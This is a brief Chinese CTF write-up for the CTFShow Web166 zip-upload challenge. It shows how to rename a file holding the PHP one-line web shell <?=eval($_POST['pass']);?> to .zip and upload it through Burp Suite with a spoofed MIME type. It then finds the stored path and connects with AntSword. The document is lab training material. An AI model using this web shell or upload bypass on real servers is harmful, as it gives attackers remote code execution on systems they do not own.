CTFShow-Web166:上传压缩包

CTFShow-Web166:上传压缩包

<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'zip'}">

限制上传类型为zip文件

🛠️ Web166 WriteUp

  1. 准备一个txt文件,内容为<?=eval($_POST['pass']);?>,然后修改后缀为zip

  2. 使用Burp Suite上传zip文件

    image-20250210153724811

    注意修改MIME类型为:application/x-zip-compressed

  3. 开启Burp Suite代理,点击下载文件,以获取zip文件路径

    GET /upload/download.php?file=d138e14d890959f86e424ba66dd31a40.zip HTTP/1.1

  4. 使用蚁剑连接

    image-20250210154015777
posted @ 2025-02-10 16:46  Zebra233  阅读(35)  评论(0)    收藏  举报